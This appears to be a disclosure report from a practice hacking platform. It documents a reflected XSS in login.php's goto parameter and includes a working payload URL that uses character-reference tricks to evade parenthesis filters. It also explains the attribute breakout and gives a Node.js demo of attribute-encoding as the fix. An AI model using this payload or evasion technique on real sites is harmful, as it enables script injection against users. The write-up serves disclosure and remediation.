FirstBlood-#308 Reflective XSS on login.php via goto parameter
This issue was discovered on FirstBlood v2



On 2021-10-25, panya Level 7 reported:

The goto parameter is still vulnerable to reflective XSS.

Steps to reproduce:

  1. Open https://579a3c7897af-panya.a.firstbloodhackers.com/login.php?goto=%22%3E%3Csvg/style=%22position:fixed;top:0;left:0;width:100%;height:100%;z-index:100%22/onpointerrawupdate=%22%0aconfirm%26lpar;origin%26rpar;%22%3E
  2. Move the mouse to any point of the site.

Actual result:

There will be an alert with the text "https://579a3c7897af-panya.a.firstbloodhackers.com"

Expected result:

The goto parameter value should be properly escaped or sanitized. The alert should not be shown.

Impact:

XSS on behalf of a user of this site.

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: "><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"/onpointerrawupdate="%0aconfirm%26lpar;origin%26rpar;">


FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed the reflection of ?goto= inside an input tag on login.php when addressing a similar bug (ID 39), but because this endpoint uses legacy code their change was never applied here, and the XSS was forgotten. The payload exploits exactly that attribute context: the leading "> closes the value attribute and the input tag, so the remainder is parsed as a new svg element whose fixed, full-viewport style makes any mouse movement fire onpointerrawupdate. The &lpar; and &rpar; character references are decoded by the browser inside the attribute value before the handler runs, so it executes confirm(origin) even though no literal parenthesis appears in the request. The fix is to HTML-attribute-encode the value at the point where this endpoint outputs it, not only at the occurrence patched for ID 39.
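As an added example (not FirstBlood's code and not part of the report), the following Node.js script shows why the reported payload works against a raw reflection into an input attribute and why attribute-encoding at the point of output stops it. The form markup, the helper names and the small character-reference decoder are assumptions made for illustration; the real login.php is not reproduced.

```javascript
// Added example, not FirstBlood's code: how the report's payload breaks out
// of the input attribute that reflects ?goto=, and what the hardened output
// looks like. Function names and the form markup are assumptions.

// The payload from the report, URL-decoded as the server receives it.
// "%0a" is a newline, and "&lpar;"/"&rpar;" are HTML named character
// references for "(" and ")".
const PAYLOAD =
  '"><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"' +
  '/onpointerrawupdate="\nconfirm&lpar;origin&rpar;">';

// Vulnerable rendering: the parameter is interpolated raw into a quoted
// attribute, so a leading "> closes the attribute and the <input> tag.
function renderVulnerable(goto) {
  return `<input type="hidden" name="goto" value="${goto}">`;
}

// Hardened rendering: encode every character that can end the attribute,
// start a tag or begin a character reference before it is emitted.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(goto) {
  return `<input type="hidden" name="goto" value="${escapeHtmlAttr(goto)}">`;
}

// Count element start tags in the rendered fragment. The form should
// contain exactly one (<input>); a second one means the value escaped.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Pull the raw source of a double-quoted attribute, or null if absent.
function extractAttr(html, name) {
  const m = html.match(new RegExp(`${name}="([^"]*)"`));
  return m ? m[1] : null;
}

// Model the browser's handling of an attribute value: named character
// references are decoded before the event-handler source reaches the JS
// engine. Only the references relevant here are mapped; others are kept.
function decodeNamedRefs(attrValue) {
  const refs = { lpar: '(', rpar: ')', lt: '<', gt: '>', amp: '&', quot: '"' };
  return attrValue.replace(/&([a-zA-Z]+);/g, (whole, name) =>
    Object.prototype.hasOwnProperty.call(refs, name) ? refs[name] : whole);
}

// What the injected event handler would actually execute, if the value
// escaped the attribute; null when no such handler attribute exists.
function handlerSource(html) {
  const raw = extractAttr(html, 'onpointerrawupdate');
  return raw === null ? null : decodeNamedRefs(raw).trim();
}

// Stand-alone demo.
console.log('vulnerable tags:', countStartTags(renderVulnerable(PAYLOAD)));   // 2
console.log('vulnerable handler:', handlerSource(renderVulnerable(PAYLOAD))); // confirm(origin)
console.log('hardened tags:', countStartTags(renderHardened(PAYLOAD)));       // 1
console.log('hardened handler:', handlerSource(renderHardened(PAYLOAD)));     // null
```

Run it with node. The tag count and attribute extraction are deliberately crude checks for illustration; a regression test for the real endpoint should parse the response with a proper HTML parser and assert that the only element in the form is the expected input. The decoder step is the part worth remembering: because the browser decodes character references inside attribute values, a server-side filter that only looks for literal parentheses or a "confirm(" substring would not have caught this payload, whereas output encoding of the five characters above removes the attribute breakout entirely.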